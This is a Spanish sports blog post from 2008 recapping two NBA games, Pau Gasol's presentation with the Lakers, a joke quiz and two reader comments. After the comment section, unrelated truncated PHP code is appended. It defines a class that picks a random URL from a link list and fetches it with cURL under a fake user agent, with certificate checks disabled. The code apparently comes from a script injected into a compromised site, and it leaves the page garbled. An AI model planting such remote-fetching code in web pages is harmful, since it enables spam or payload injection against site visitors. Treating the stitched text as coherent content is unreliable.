La crónica (03/02/08)

04 de February de 2008 por MagicJohnson32

Ayer fue día de SuperBowl, por lo que la NBA redujo su actividad a dos partidos tempraneros para dar paso al gran evento del football. Nos quedamos con las ganas de ver el debut de Pau Gasol con los Lakers, que no le necesitaron para ganar muy cómodamente en Washington. A continuación, Detroit exhibió su defensa ante unos Mavs que firmaron su peor actuación ofensiva de la temporada. Hoy nuestro primer vídeo es la entrevista realizada por la televisión de Los Angeles a Pau tras su presentación.

Resumamos lo ocurrido en los dos partidos jugados ayer:
kobewashingtonclapLakers 103 – 91 Wizards

Teníamos la esperanza de ver debutar a Gasol ayer como laker, algo para lo que tendremos que esperar hasta el martes. Así que los Lakers se presentaron en Washington sin Pau, ni Bynum, ni Mihm ni, claro está, Kwame Brown, o lo que es lo mismo, con un juego interior compuesto por Turiaf y Mbenga. No hizo falta más. Kobe Bryant anotó 19 puntos en el primer cuarto, 4 más que todo el equipo rival, y los angelinos abrieron un hueco en el marcador que resultó definitivo. Los Wizards pudieron contar con Butler, de regreso después de perderse tres encuentros por lesión, pero no pudieron frenar a los Lakers, que mostraron una enorme fluidez ofensiva y se movieron en porcentajes cercanos al 60% de acierto durante buena parte del encuentro (66% al descanso). Radmanovic, Odom, Turiaf y Vujacic lograron entre 12 y 15 puntos e incluso Mbenga tuvo tiempo de anotar sus tres tiros de campo. En los Wizards, Jamison consiguió 21 puntos y 11 rebotes, Butler hizo 15-5-7, y Young y Mason destacaron desde el banquillo con 14 puntos cada uno. De este modo, los Lakers logran su tercera victoria en los cuatro últimos partidos y se mantienen con dos derrotas más que los líderes del Oeste, mientras que para los Wizards fue la tercera derrota seguida, pese a lo que siguen en posiciones de Playoffs con cierta holgura.

Mavs 67 – 90 Pistonsaverydetroit

Un 30% en tiros de campo; 3 de 18 de Nowitzki, 3 de 11 de Terry, 6 de 17 de Howard. Los Mavericks lo pasaron realmente mal anoche en el Palace de Auburn Hills ante unos Pistons que mantuvieron a su rival sin anotar una canasta en juego durante más de 8 minutos de la primera mitad. El equipo texano, que tenía las bajas de Devin Harris y Stackhouse, erró 16 lanzamientos consecutivos y se quedó en menos de 17 puntos en tres de los cuatro cuartos. Los Pistons, en cambio, lograron más de 20 en cada uno de ellos liderados por Rasheed Wallace, autor de 21 puntos, 9 rebotes, 4 tapones y 3 asistencias, y tan motivado como para gritar al banquillo visitante “He can’t guard me!” (¡él no puede defenderme!) tras anotar sobre Dirk Nowitzki. Al margen de Sheed, Taysh Prince realizó un partido impecable con 4 de 4 en tiros de campo, 8 de 8 en libres, 7 rebotes y 3 asistencias, y Stuckey y Hayes aportaron dobles figuras anotadoras desde el banquillo. Es el quinto triunfo seguido para los Pistons y la segunda derrota para Dallas.

Nuestro MVP: Si supiera que Pau Gasol va a jugar en mi equipo también me alegraría. Kobe Bryant realizó un partido redondo con 10 de 15 en tiros, 30 puntos, 6 rebotes y 2 asistencias. En Los Angeles los ánimos están por las nubes.

El rookie: Fue uno de los que mejor impresión dejó en las ligas de verano pero una fractura de muñeca le ha hecho perderse todo el inicio de la temporada. Hoy, Rodney Stuckey ha hecho un buen partido como primer recambio de Billups y RIP.

La sorpresa: Decir que Brandon Bass, jugando donde juega, ha sido el mejor de su equipo ya es por si solo la sorpresa de la jornada. Pero es que los 14 puntos, 6 rebotes y 5 de 9 en tiros, no son, en absoluto, malos números.

La decepción: Todo el equipo de los Dallas Mavericks (salvo el propio Brass) por su 30% en tiros de 2, su 14% en tiros de 3 y por no ser capaces de llegar a 70 puntos. Lamentable en un equipo que quiere ganar el título.

Pasatiempos: ¿Por qué compareció Pau Gasol ante los medios de comunicación?

paumediaintroduction A) para pedir disculpas públicamente a Navarro por dejarlo tirado en Memphis con Kwame Brown y Milicic como juego interior

B) para explicar, compungido, que su ex hermano Marc ha renunciado al apellido Gasol después de que sus derechos hayan sido traspasados de Lakers a Grizzlies (se rumorea que se lo cambiará por el de Gay)

C) para explicar por qué no se había peinado esa mañana

D) para explicar el accidente en el que se habían visto envueltas su camiseta y la botella de lejía

E) para decir, a todos aquellos aficionados de Memphis que le habían abucheado: “Ale, ahí os quedáis con Kwame Brown, gili#@|~#|@#!!”

F) para ser presentado como jugador de Los Angeles Lakers

Respuesta correcta: la F, evidentemente, pero ¿era necesario aparecer con esas pintas en su primer acto como jugador de los Lakers? El premio para el ganador es un trozo de la pared que Michael Jordan tumbó a cabezazos por elegir con el número 1 del draft de 2001 a Kwame Brown y no a Pau Gasol en su época como presidente de operaciones de los Wizards.

Acabamos con la exhibición de potencia de Jason Maxiell:

Comenta

2 comentarios a esta entrada

  1. RusticoColorao dice:
    #1

    Pufff…que equipo más incómodo es Detroit, la verdad que sus partidos son feos feos. Pero Dallas ha de moverse…Kidd debería volver a casa (al menos su primera casa) para que puedan meterse en el pelotón de favoritos.

    LA está fino fino en ataque, pero tengo muchas dudas de cómo encajará Pau y del nivel defensivo del equipo. La pareja Bynum-Pau puede ser bestial, pero también puede ser un show en defensa. ¿Y Odom rendirá de una vez como tercer-cuarto escudero?

    PD…vaya pintas de Gasol, ¿dónde está el glamour de LA?

      Citar

  2. telekoman dice:
    #2

    El glamour vendrá cuando el amigo Nicholson le diga que esas pintas las deje para los suburbios.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>